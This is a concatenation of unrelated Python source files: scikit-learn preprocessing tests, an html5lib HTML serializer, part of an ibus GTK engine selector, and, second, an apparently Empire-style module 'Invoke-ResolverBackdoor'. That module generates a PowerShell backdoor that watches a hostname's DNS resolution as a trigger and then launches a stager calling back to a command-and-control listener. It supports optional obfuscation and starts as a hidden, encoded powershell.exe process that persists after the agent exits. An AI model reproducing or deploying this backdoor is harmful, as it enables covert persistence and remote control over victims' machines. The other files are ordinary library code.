X_scaled = scaler.fit(X).transform(X, copy=True)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=0), 5 * [0.0])
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
# Check that X has not been copied
assert_true(X_scaled is not X)
# check inverse transform
X_scaled_back = scaler.inverse_transform(X_scaled)
assert_true(X_scaled_back is not X)
assert_true(X_scaled_back is not X_scaled)
assert_array_almost_equal(X_scaled_back, X)
X_scaled = scale(X, axis=1, with_std=False)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=1), 4 * [0.0])
X_scaled = scale(X, axis=1, with_std=True)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=1), 4 * [0.0])
assert_array_almost_equal(X_scaled.std(axis=1), 4 * [1.0])
# Check that the data hasn't been modified
assert_true(X_scaled is not X)
X_scaled = scaler.fit(X).transform(X, copy=False)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=0), 5 * [0.0])
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
# Check that X has not been copied
assert_true(X_scaled is X)
X = rng.randn(4, 5)
X[:, 0] = 1.0 # first feature is a constant, non zero feature
scaler = StandardScaler()
X_scaled = scaler.fit(X).transform(X, copy=True)
assert_false(np.any(np.isnan(X_scaled)))
assert_array_almost_equal(X_scaled.mean(axis=0), 5 * [0.0])
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
# Check that X has not been copied
assert_true(X_scaled is not X)
def test_min_max_scaler():
X = iris.data
scaler = MinMaxScaler()
# default params
X_trans = scaler.fit_transform(X)
assert_array_equal(X_trans.min(axis=0), 0)
assert_array_equal(X_trans.min(axis=0), 0)
assert_array_equal(X_trans.max(axis=0), 1)
# not default params
scaler = MinMaxScaler(feature_range=(1, 2))
X_trans = scaler.fit_transform(X)
assert_array_equal(X_trans.min(axis=0), 1)
assert_array_equal(X_trans.max(axis=0), 2)
def test_scaler_without_centering():
rng = np.random.RandomState(42)
X = rng.randn(4, 5)
X[:, 0] = 0.0 # first feature is always of zero
X_csr = sp.csr_matrix(X)
scaler = StandardScaler(with_mean=False).fit(X)
X_scaled = scaler.transform(X, copy=True)
assert_false(np.any(np.isnan(X_scaled)))
scaler_csr = StandardScaler(with_mean=False).fit(X_csr)
X_csr_scaled = scaler_csr.transform(X_csr, copy=True)
assert_false(np.any(np.isnan(X_csr_scaled.data)))
assert_equal(scaler.mean_, scaler_csr.mean_)
assert_array_almost_equal(scaler.std_, scaler_csr.std_)
assert_array_almost_equal(
X_scaled.mean(axis=0), [0., -0.01, 2.24, -0.35, -0.78], 2)
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
X_csr_scaled_mean, X_csr_scaled_std = mean_variance_axis0(X_csr_scaled)
assert_array_almost_equal(X_csr_scaled_mean, X_scaled.mean(axis=0))
assert_array_almost_equal(X_csr_scaled_std, X_scaled.std(axis=0))
# Check that X has not been modified (copy)
assert_true(X_scaled is not X)
assert_true(X_csr_scaled is not X_csr)
X_scaled_back = scaler.inverse_transform(X_scaled)
assert_true(X_scaled_back is not X)
assert_true(X_scaled_back is not X_scaled)
assert_array_almost_equal(X_scaled_back, X)
X_csr_scaled_back = scaler_csr.inverse_transform(X_csr_scaled)
assert_true(X_csr_scaled_back is not X_csr)
assert_true(X_csr_scaled_back is not X_csr_scaled)
assert_array_almost_equal(X_scaled_back, X)
def test_scaler_without_copy():
"""Check that StandardScaler.fit does not change input"""
rng = np.random.RandomState(42)
X = rng.randn(4, 5)
X[:, 0] = 0.0 # first feature is always of zero
X_csr = sp.csr_matrix(X)
X_copy = X.copy()
StandardScaler(copy=False).fit(X)
assert_array_equal(X, X_copy)
X_csr_copy = X_csr.copy()
StandardScaler(with_mean=False, copy=False).fit(X_csr)
assert_array_equal(X_csr.toarray(), X_csr_copy.toarray())
def test_scale_sparse_with_mean_raise_exception():
rng = np.random.RandomState(42)
X = rng.randn(4, 5)
X_csr = sp.csr_matrix(X)
# check scaling and fit with direct calls on sparse data
assert_raises(ValueError, scale, X_csr, with_mean=True)
assert_raises(ValueError, StandardScaler(with_mean=True).fit, X_csr)
# check transform and inverse_transform after a fit on a dense array
scaler = StandardScaler(with_mean=True).fit(X)
assert_raises(ValueError, scaler.transform, X_csr)
X_transformed_csr = sp.csr_matrix(scaler.transform(X))
assert_raises(ValueError, scaler.inverse_transform, X_transformed_csr)
def test_scale_function_without_centering():
rng = np.random.RandomState(42)
X = rng.randn(4, 5)
X[:, 0] = 0.0 # first feature is always of zero
X_csr = sp.csr_matrix(X)
X_scaled = scale(X, with_mean=False)
assert_false(np.any(np.isnan(X_scaled)))
X_csr_scaled = scale(X_csr, with_mean=False)
assert_false(np.any(np.isnan(X_csr_scaled.data)))
assert_array_almost_equal(
X_scaled.mean(axis=0), [0., -0.01, 2.24, -0.35, -0.78], 2)
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
# Check that X has not been copied
assert_true(X_scaled is not X)
X_csr_scaled_mean, X_csr_scaled_std = mean_variance_axis0(X_csr_scaled)
assert_array_almost_equal(X_csr_scaled_mean, X_scaled.mean(axis=0))
assert_array_almost_equal(X_csr_scaled_std, X_scaled.std(axis=0))
def test_normalizer_l1():
rng = np.random.RandomState(0)
X_dense = rng.randn(4, 5)
X_sparse_unpruned = sp.csr_matrix(X_dense)
# set the row number 3 to zero
X_dense[3, :] = 0.0
# set the row number 3 to zero without pruning (can happen in real life)
indptr_3 = X_sparse_unpruned.indptr[3]
indptr_4 = X_sparse_unpruned.indptr[4]
X_sparse_unpruned.data[indptr_3:indptr_4] = 0.0
# build the pruned variant using the regular constructor
X_sparse_pruned = sp.csr_matrix(X_dense)
# check inputs that support the no-copy optim
for X in (X_dense, X_sparse_pruned, X_sparse_unpruned):
normalizer = Normalizer(norm='l1', copy=True)
X_norm = normalizer.transform(X)
assert_true(X_norm is not X)
X_norm1 = toarray(X_norm)
normalizer = Normalizer(norm='l1', copy=False)
X_norm = normalizer.transform(X)
assert_true(X_norm is X)
X_norm2 = toarray(X_norm)
for X_norm in (X_norm1, X_norm2):
row_sums = np.abs(X_norm).sum(axis=1)
for i in range(3):
assert_almost_equal(row_sums[i], 1.0)
assert_almost_equal(row_sums[3], 0.0)
# check input for which copy=False won't prevent a copy
for init in (sp.coo_matrix, sp.csc_matrix, sp.lil_matrix):
X = init(X_dense)
X_norm = normalizer = Normalizer(norm='l2', copy=False).transform(X)
assert_true(X_norm is not X)
assert_true(isinstance(X_norm, sp.csr_matrix))
X_norm = toarray(X_norm)
for i in xrange(3):
assert_almost_equal(row_sums[i], 1.0)
assert_almost_equal(la.norm(X_norm[3]), 0.0)
def test_normalizer_l2():
rng = np.random.RandomState(0)
X_dense = rng.randn(4, 5)
X_sparse_unpruned = sp.csr_matrix(X_dense)
# set the row number 3 to zero
X_dense[3, :] = 0.0
# set the row number 3 to zero without pruning (can happen in real life)
indptr_3 = X_sparse_unpruned.indptr[3]
indptr_4 = X_sparse_unpruned.indptr[4]
X_sparse_unpruned.data[indptr_3:indptr_4] = 0.0
# build the pruned variant using the regular constructor
X_sparse_pruned = sp.csr_matrix(X_dense)
# check inputs that support the no-copy optim
for X in (X_dense, X_sparse_pruned, X_sparse_unpruned):
normalizer = Normalizer(norm='l2', copy=True)
X_norm1 = normalizer.transform(X)
assert_true(X_norm1 is not X)
X_norm1 = toarray(X_norm1)
normalizer = Normalizer(norm='l2', copy=False)
X_norm2 = normalizer.transform(X)
assert_true(X_norm2 is X)
X_norm2 = toarray(X_norm2)
for X_norm in (X_norm1, X_norm2):
for i in xrange(3):
assert_almost_equal(la.norm(X_norm[i]), 1.0)
assert_almost_equal(la.norm(X_norm[3]), 0.0)
# check input for which copy=False won't prevent a copy
for init in (sp.coo_matrix, sp.csc_matrix, sp.lil_matrix):
X = init(X_dense)
X_norm = normalizer = Normalizer(norm='l2', copy=False).transform(X)
assert_true(X_norm is not X)
assert_true(isinstance(X_norm, sp.csr_matrix))
X_norm = toarray(X_norm)
for i in xrange(3):
assert_almost_equal(la.norm(X_norm[i]), 1.0)
assert_almost_equal(la.norm(X_norm[3]), 0.0)
def test_normalize_errors():
"""Check that invalid arguments yield ValueError"""
assert_raises(ValueError, normalize, [[0]], axis=2)
assert_raises(ValueError, normalize, [[0]], norm='l3')
def test_binarizer():
X_ = np.array([[1, 0, 5], [2, 3, 0]])
for init in (np.array, sp.csr_matrix):
X = init(X_.copy())
binarizer = Binarizer(threshold=2.0, copy=True)
X_bin = toarray(binarizer.transform(X))
assert_equal(np.sum(X_bin == 0), 4)
assert_equal(np.sum(X_bin == 1), 2)
binarizer = Binarizer(copy=True).fit(X)
X_bin = toarray(binarizer.transform(X))
assert_true(X_bin is not X)
assert_equal(np.sum(X_bin == 0), 2)
assert_equal(np.sum(X_bin == 1), 4)
binarizer = Binarizer(copy=True)
X_bin = binarizer.transform(X)
assert_true(X_bin is not X)
X_bin = toarray(X_bin)
assert_equal(np.sum(X_bin == 0), 2)
assert_equal(np.sum(X_bin == 1), 4)
binarizer = Binarizer(copy=False)
X_bin = binarizer.transform(X)
assert_true(X_bin is X)
X_bin = toarray(X_bin)
assert_equal(np.sum(X_bin == 0), 2)
assert_equal(np.sum(X_bin == 1), 4)
def test_label_binarizer():
lb = LabelBinarizer()
# two-class case
inp = ["neg", "pos", "pos", "neg"]
expected = np.array([[0, 1, 1, 0]]).T
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_array_equal(lb.inverse_transform(got), inp)
# multi-class case
inp = ["spam", "ham", "eggs", "ham", "0"]
expected = np.array([[0, 0, 0, 1],
[0, 0, 1, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[1, 0, 0, 0]])
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_array_equal(lb.inverse_transform(got), inp)
def test_label_binarizer_set_label_encoding():
lb = LabelBinarizer(neg_label=-2, pos_label=2)
# two-class case
inp = np.array([0, 1, 1, 0])
expected = np.array([[-2, 2, 2, -2]]).T
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_array_equal(lb.inverse_transform(got), inp)
# multi-class case
inp = np.array([3, 2, 1, 2, 0])
expected = np.array([[-2, -2, -2, +2],
[-2, -2, +2, -2],
[-2, +2, -2, -2],
[-2, -2, +2, -2],
[+2, -2, -2, -2]])
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_array_equal(lb.inverse_transform(got), inp)
def test_label_binarizer_multilabel():
lb = LabelBinarizer()
# test input as lists of tuples
inp = [(2, 3), (1,), (1, 2)]
indicator_mat = np.array([[0, 1, 1],
[1, 0, 0],
[1, 1, 0]])
got = lb.fit_transform(inp)
assert_array_equal(indicator_mat, got)
assert_equal(lb.inverse_transform(got), inp)
# test input as label indicator matrix
lb.fit(indicator_mat)
assert_array_equal(indicator_mat,
lb.inverse_transform(indicator_mat))
# regression test for the two-class multilabel case
lb = LabelBinarizer()
inp = [[1, 0], [0], [1], [0, 1]]
expected = np.array([[1, 1],
[1, 0],
[0, 1],
[1, 1]])
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_equal([set(x) for x in lb.inverse_transform(got)],
[set(x) for x in inp])
def test_label_binarizer_errors():
"""Check that invalid arguments yield ValueError"""
one_class = np.array([0, 0, 0, 0])
lb = LabelBinarizer().fit(one_class)
multi_label = [(2, 3), (0,), (0, 2)]
assert_raises(ValueError, lb.transform, multi_label)
lb = LabelBinarizer()
assert_raises(ValueError, lb.transform, [])
assert_raises(ValueError, lb.inverse_transform, [])
assert_raises(ValueError, LabelBinarizer, neg_label=2, pos_label=1)
assert_raises(ValueError, LabelBinarizer, neg_label=2, pos_label=2)
def test_label_encoder():
"""Test LabelEncoder's transform and inverse_transform methods"""
le = LabelEncoder()
le.fit([1, 1, 4, 5, -1, 0])
assert_array_equal(le.classes_, [-1, 0, 1, 4, 5])
assert_array_equal(le.transform([0, 1, 4, 4, 5, -1, -1]),
[1, 2, 3, 3, 4, 0, 0])
assert_array_equal(le.inverse_transform([1, 2, 3, 3, 4, 0, 0]),
[0, 1, 4, 4, 5, -1, -1])
assert_raises(ValueError, le.transform, [0, 6])
def test_label_encoder_fit_transform():
"""Test fit_transform"""
le = LabelEncoder()
ret = le.fit_transform([1, 1, 4, 5, -1, 0])
assert_array_equal(ret, [2, 2, 3, 4, 0, 1])
le = LabelEncoder()
ret = le.fit_transform(["paris", "paris", "tokyo", "amsterdam"])
assert_array_equal(ret, [1, 1, 2, 0])
def test_label_encoder_string_labels():
"""Test LabelEncoder's transform and inverse_transform methods with
non-numeric labels"""
le = LabelEncoder()
le.fit(["paris", "paris", "tokyo", "amsterdam"])
assert_array_equal(le.classes_, ["amsterdam", "paris", "tokyo"])
assert_array_equal(le.transform(["tokyo", "tokyo", "paris"]),
[2, 2, 1])
assert_array_equal(le.inverse_transform([2, 2, 1]),
["tokyo", "tokyo", "paris"])
assert_raises(ValueError, le.transform, ["london"])
def test_label_encoder_errors():
"""Check that invalid arguments yield ValueError"""
le = LabelEncoder()
assert_raises(ValueError, le.transform, [])
assert_raises(ValueError, le.inverse_transform, [])
def test_label_binarizer_iris():
lb = LabelBinarizer()
Y = lb.fit_transform(iris.target)
clfs = [SGDClassifier().fit(iris.data, Y[:, k])
for k in range(len(lb.classes_))]
Y_pred = np.array([clf.decision_function(iris.data) for clf in clfs]).T
y_pred = lb.inverse_transform(Y_pred)
accuracy = np.mean(iris.target == y_pred)
y_pred2 = SGDClassifier().fit(iris.data, iris.target).predict(iris.data)
accuracy2 = np.mean(iris.target == y_pred2)
assert_almost_equal(accuracy, accuracy2)
def test_label_binarizer_multilabel_unlabeled():
"""Check that LabelBinarizer can handle an unlabeled sample"""
lb = LabelBinarizer()
y = [[1, 2], [1], []]
Y = np.array([[1, 1],
[1, 0],
[0, 0]])
assert_array_equal(lb.fit_transform(y), Y)
def test_center_kernel():
"""Test that KernelCenterer is equivalent to StandardScaler
in feature space"""
rng = np.random.RandomState(0)
X_fit = rng.random_sample((5, 4))
scaler = StandardScaler(with_std=False)
scaler.fit(X_fit)
X_fit_centered = scaler.transform(X_fit)
K_fit = np.dot(X_fit, X_fit.T)
# center fit time matrix
centerer = KernelCenterer()
K_fit_centered = np.dot(X_fit_centered, X_fit_centered.T)
K_fit_centered2 = centerer.fit_transform(K_fit)
assert_array_almost_equal(K_fit_centered, K_fit_centered2)
# center predict time matrix
X_pred = rng.random_sample((2, 4))
K_pred = np.dot(X_pred, X_fit.T)
X_pred_centered = scaler.transform(X_pred)
K_pred_centered = np.dot(X_pred_centered, X_fit_centered.T)
K_pred_centered2 = centerer.transform(K_pred)
assert_array_almost_equal(K_pred_centered, K_pred_centered2)
def test_fit_transform():
rng = np.random.RandomState(0)
X = rng.random_sample((5, 4))
for obj in ((StandardScaler(), Normalizer(), Binarizer())):
X_transformed = obj.fit(X).transform(X)
X_transformed2 = obj.fit_transform(X)
assert_array_equal(X_transformed, X_transformed2) | unknown | codeparrot/codeparrot-clean | ||
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-ResolverBackdoor',
'Author': ['@sixdub'],
'Description': ('Starts the Resolver Backdoor.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://sixdub.net'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description' : 'Output the backdoor to a file instead of tasking to an agent.',
'Required' : False,
'Value' : ''
},
'Hostname' : {
'Description' : 'Hostname to routinely check for a trigger.',
'Required' : True,
'Value' : ''
},
'Trigger' : {
'Description' : 'The IP Address that the backdoor is looking for.',
'Required' : True,
'Value' : '127.0.0.1'
},
'Timeout' : {
'Description' : 'Time (in seconds) to run the backdoor. Defaults to 0 (run forever).',
'Required' : True,
'Value' : '0'
},
'Sleep' : {
'Description' : 'Time (in seconds) to sleep between checks.',
'Required' : True,
'Value' : '30'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Invoke-ResolverBackdoor
{
param(
[Parameter(Mandatory=$False,Position=1)]
[string]$Hostname,
[Parameter(Mandatory=$False,Position=2)]
[string]$Trigger="127.0.0.1",
[Parameter(Mandatory=$False,Position=3)]
[int] $Timeout=0,
[Parameter(Mandatory=$False,Position=4)]
[int] $Sleep=30
)
$running=$True
$match =""
$starttime = Get-Date
while($running)
{
if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
{
$running=$False
}
try {
$ips = [System.Net.Dns]::GetHostAddresses($Hostname)
foreach ($addr in $ips)
{
$resolved=$addr.IPAddressToString
if($resolved -ne $Trigger)
{
$running=$False
REPLACE_LAUNCHER
}
}
}
catch [System.Net.Sockets.SocketException]{
}
Start-Sleep -s $Sleep
}
}
Invoke-ResolverBackdoor"""
listenerName = self.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# set the listener value for the launcher
stager = self.mainMenu.stagers.stagers["multi/launcher"]
stager.options['Listener']['Value'] = listenerName
stager.options['Base64']['Value'] = "False"
# and generate the code
stagerCode = stager.generate()
if stagerCode == "":
return ""
else:
script = script.replace("REPLACE_LAUNCHER", stagerCode)
script = script.encode('ascii', 'ignore')
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
outFile = self.options['OutFile']['Value']
if outFile != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(outFile)) and os.path.dirname(outFile) != '':
os.makedirs(os.path.dirname(outFile))
f = open(outFile, 'w')
f.write(script)
f.close()
print helpers.color("[+] PowerBreach deaduser backdoor written to " + outFile)
return ""
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stagerCode.split(" ")
# set up the start-process command so no new windows appears
scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:]))
if obfuscate:
scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand)
return scriptLauncher | unknown | codeparrot/codeparrot-clean | ||
from __future__ import absolute_import, division, unicode_literals
from pip.vendor.six import text_type
import gettext
_ = gettext.gettext
try:
from functools import reduce
except ImportError:
pass
from ..constants import voidElements, booleanAttributes, spaceCharacters
from ..constants import rcdataElements, entities, xmlEntities
from .. import utils
from xml.sax.saxutils import escape
spaceCharacters = "".join(spaceCharacters)
try:
from codecs import register_error, xmlcharrefreplace_errors
except ImportError:
unicode_encode_errors = "strict"
else:
unicode_encode_errors = "htmlentityreplace"
encode_entity_map = {}
is_ucs4 = len("\U0010FFFF") == 1
for k, v in list(entities.items()):
# skip multi-character entities
if ((is_ucs4 and len(v) > 1) or
(not is_ucs4 and len(v) > 2)):
continue
if v != "&":
if len(v) == 2:
v = utils.surrogatePairToCodepoint(v)
else:
v = ord(v)
if not v in encode_entity_map or k.islower():
# prefer < over < and similarly for &, >, etc.
encode_entity_map[v] = k
def htmlentityreplace_errors(exc):
if isinstance(exc, (UnicodeEncodeError, UnicodeTranslateError)):
res = []
codepoints = []
skip = False
for i, c in enumerate(exc.object[exc.start:exc.end]):
if skip:
skip = False
continue
index = i + exc.start
if utils.isSurrogatePair(exc.object[index:min([exc.end, index + 2])]):
codepoint = utils.surrogatePairToCodepoint(exc.object[index:index + 2])
skip = True
else:
codepoint = ord(c)
codepoints.append(codepoint)
for cp in codepoints:
e = encode_entity_map.get(cp)
if e:
res.append("&")
res.append(e)
if not e.endswith(";"):
res.append(";")
else:
res.append("&#x%s;" % (hex(cp)[2:]))
return ("".join(res), exc.end)
else:
return xmlcharrefreplace_errors(exc)
register_error(unicode_encode_errors, htmlentityreplace_errors)
del register_error
class HTMLSerializer(object):
# attribute quoting options
quote_attr_values = False
quote_char = '"'
use_best_quote_char = True
# tag syntax options
omit_optional_tags = True
minimize_boolean_attributes = True
use_trailing_solidus = False
space_before_trailing_solidus = True
# escaping options
escape_lt_in_attrs = False
escape_rcdata = False
resolve_entities = True
# miscellaneous options
inject_meta_charset = True
strip_whitespace = False
sanitize = False
options = ("quote_attr_values", "quote_char", "use_best_quote_char",
"minimize_boolean_attributes", "use_trailing_solidus",
"space_before_trailing_solidus", "omit_optional_tags",
"strip_whitespace", "inject_meta_charset", "escape_lt_in_attrs",
"escape_rcdata", "resolve_entities", "sanitize")
def __init__(self, **kwargs):
"""Initialize HTMLSerializer.
Keyword options (default given first unless specified) include:
inject_meta_charset=True|False
Whether it insert a meta element to define the character set of the
document.
quote_attr_values=True|False
Whether to quote attribute values that don't require quoting
per HTML5 parsing rules.
quote_char=u'"'|u"'"
Use given quote character for attribute quoting. Default is to
use double quote unless attribute value contains a double quote,
in which case single quotes are used instead.
escape_lt_in_attrs=False|True
Whether to escape < in attribute values.
escape_rcdata=False|True
Whether to escape characters that need to be escaped within normal
elements within rcdata elements such as style.
resolve_entities=True|False
Whether to resolve named character entities that appear in the
source tree. The XML predefined entities < > & " '
are unaffected by this setting.
strip_whitespace=False|True
Whether to remove semantically meaningless whitespace. (This
compresses all whitespace to a single space except within pre.)
minimize_boolean_attributes=True|False
Shortens boolean attributes to give just the attribute value,
for example <input disabled="disabled"> becomes <input disabled>.
use_trailing_solidus=False|True
Includes a close-tag slash at the end of the start tag of void
elements (empty elements whose end tag is forbidden). E.g. <hr/>.
space_before_trailing_solidus=True|False
Places a space immediately before the closing slash in a tag
using a trailing solidus. E.g. <hr />. Requires use_trailing_solidus.
sanitize=False|True
Strip all unsafe or unknown constructs from output.
See `html5lib user documentation`_
omit_optional_tags=True|False
Omit start/end tags that are optional.
.. _html5lib user documentation: http://code.google.com/p/html5lib/wiki/UserDocumentation
"""
if 'quote_char' in kwargs:
self.use_best_quote_char = False
for attr in self.options:
setattr(self, attr, kwargs.get(attr, getattr(self, attr)))
self.errors = []
self.strict = False
def encode(self, string):
assert(isinstance(string, text_type))
if self.encoding:
return string.encode(self.encoding, unicode_encode_errors)
else:
return string
def encodeStrict(self, string):
assert(isinstance(string, text_type))
if self.encoding:
return string.encode(self.encoding, "strict")
else:
return string
def serialize(self, treewalker, encoding=None):
self.encoding = encoding
in_cdata = False
self.errors = []
if encoding and self.inject_meta_charset:
from ..filters.inject_meta_charset import Filter
treewalker = Filter(treewalker, encoding)
# XXX: WhitespaceFilter should be used before OptionalTagFilter
# for maximum efficiently of this latter filter
if self.strip_whitespace:
from ..filters.whitespace import Filter
treewalker = Filter(treewalker)
if self.sanitize:
from ..filters.sanitizer import Filter
treewalker = Filter(treewalker)
if self.omit_optional_tags:
from ..filters.optionaltags import Filter
treewalker = Filter(treewalker)
for token in treewalker:
type = token["type"]
if type == "Doctype":
doctype = "<!DOCTYPE %s" % token["name"]
if token["publicId"]:
doctype += ' PUBLIC "%s"' % token["publicId"]
elif token["systemId"]:
doctype += " SYSTEM"
if token["systemId"]:
if token["systemId"].find('"') >= 0:
if token["systemId"].find("'") >= 0:
self.serializeError(_("System identifer contains both single and double quote characters"))
quote_char = "'"
else:
quote_char = '"'
doctype += " %s%s%s" % (quote_char, token["systemId"], quote_char)
doctype += ">"
yield self.encodeStrict(doctype)
elif type in ("Characters", "SpaceCharacters"):
if type == "SpaceCharacters" or in_cdata:
if in_cdata and token["data"].find("</") >= 0:
self.serializeError(_("Unexpected </ in CDATA"))
yield self.encode(token["data"])
else:
yield self.encode(escape(token["data"]))
elif type in ("StartTag", "EmptyTag"):
name = token["name"]
yield self.encodeStrict("<%s" % name)
if name in rcdataElements and not self.escape_rcdata:
in_cdata = True
elif in_cdata:
self.serializeError(_("Unexpected child element of a CDATA element"))
for (attr_namespace, attr_name), attr_value in token["data"].items():
# TODO: Add namespace support here
k = attr_name
v = attr_value
yield self.encodeStrict(' ')
yield self.encodeStrict(k)
if not self.minimize_boolean_attributes or \
(k not in booleanAttributes.get(name, tuple())
and k not in booleanAttributes.get("", tuple())):
yield self.encodeStrict("=")
if self.quote_attr_values or not v:
quote_attr = True
else:
quote_attr = reduce(lambda x, y: x or (y in v),
spaceCharacters + ">\"'=", False)
v = v.replace("&", "&")
if self.escape_lt_in_attrs:
v = v.replace("<", "<")
if quote_attr:
quote_char = self.quote_char
if self.use_best_quote_char:
if "'" in v and '"' not in v:
quote_char = '"'
elif '"' in v and "'" not in v:
quote_char = "'"
if quote_char == "'":
v = v.replace("'", "'")
else:
v = v.replace('"', """)
yield self.encodeStrict(quote_char)
yield self.encode(v)
yield self.encodeStrict(quote_char)
else:
yield self.encode(v)
if name in voidElements and self.use_trailing_solidus:
if self.space_before_trailing_solidus:
yield self.encodeStrict(" /")
else:
yield self.encodeStrict("/")
yield self.encode(">")
elif type == "EndTag":
name = token["name"]
if name in rcdataElements:
in_cdata = False
elif in_cdata:
self.serializeError(_("Unexpected child element of a CDATA element"))
yield self.encodeStrict("</%s>" % name)
elif type == "Comment":
data = token["data"]
if data.find("--") >= 0:
self.serializeError(_("Comment contains --"))
yield self.encodeStrict("<!--%s-->" % token["data"])
elif type == "Entity":
name = token["name"]
key = name + ";"
if not key in entities:
self.serializeError(_("Entity %s not recognized" % name))
if self.resolve_entities and key not in xmlEntities:
data = entities[key]
else:
data = "&%s;" % name
yield self.encodeStrict(data)
else:
self.serializeError(token["data"])
def render(self, treewalker, encoding=None):
if encoding:
return b"".join(list(self.serialize(treewalker, encoding)))
else:
return "".join(list(self.serialize(treewalker)))
def serializeError(self, data="XXX ERROR MESSAGE NEEDED"):
# XXX The idea is to make data mandatory.
self.errors.append(data)
if self.strict:
raise SerializeError
def SerializeError(Exception):
"""Error in serialized tree"""
pass | unknown | codeparrot/codeparrot-clean | ||
# vim:set et sts=4 sw=4:
#
# ibus - The Input Bus
#
# Copyright (c) 2007-2010 Peng Huang <shawn.p.huang@gmail.com>
# Copyright (c) 2007-2010 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330,
# Boston, MA 02111-1307 USA
import locale
from gi.repository import GObject
from gi.repository import Gtk
from gi.repository import IBus
from gi.repository import Pango
from icon import load_icon
from i18n import _, N_
class EngineComboBox(Gtk.ComboBox):
__gtype_name__ = 'EngineComboBox'
__gproperties__ = {
'active-engine' : (
object,
'selected engine',
'selected engine',
GObject.ParamFlags.READABLE)
}
def __init__(self):
super(EngineComboBox, self).__init__()
self.connect("notify::active", self.__notify_active_cb)
self.__model = None
renderer = Gtk.CellRendererPixbuf()
renderer.set_property("xalign", 0)
renderer.set_property("xpad", 2)
self.pack_start(renderer, False)
self.set_cell_data_func(renderer, self.__icon_cell_data_cb, None)
renderer = Gtk.CellRendererText()
renderer.set_property("xalign", 0)
renderer.set_property("xpad", 2)
self.pack_start(renderer, True)
self.set_cell_data_func(renderer, self.__name_cell_data_cb, None)
def set_engines(self, engines):
self.__model = Gtk.TreeStore(object)
iter1 = self.__model.append(None)
self.__model.set(iter1, 0, 0)
langs = {}
for e in engines:
l = IBus.get_language_name(e.get_language())
if l == None:
l = ""
if l not in langs:
langs[l] = []
langs[l].append(e)
keys = langs.keys()
keys.sort(locale.strcoll)
loc = locale.getlocale()[0]
# None on C locale
if loc == None:
loc = 'en_US'
current_lang = IBus.get_language_name(loc)
# move current language to the first place
if current_lang in keys:
keys.remove(current_lang)
keys.insert(0, current_lang)
#add "Others" to the end of the combo box
if IBus.get_language_name("Other") in keys:
keys.remove(IBus.get_language_name("Other"))
keys += [IBus.get_language_name("Other")]
for l in keys:
iter1 = self.__model.append(None)
self.__model.set(iter1, 0, l)
def cmp_engine(a, b):
if a.get_rank() == b.get_rank():
return locale.strcoll(a.get_longname(), b.get_longname())
return int(b.get_rank() - a.get_rank())
langs[l].sort(cmp_engine)
for e in langs[l]:
iter2 = self.__model.append(iter1)
self.__model.set(iter2, 0, e)
self.set_model(self.__model)
self.set_active(0)
def __icon_cell_data_cb(self, celllayout, renderer, model, iter, data):
engine = self.__model.get_value(iter, 0)
if isinstance(engine, str) or isinstance (engine, unicode):
renderer.set_property("visible", False)
renderer.set_property("sensitive", False)
elif isinstance(engine, int):
renderer.set_property("visible", False)
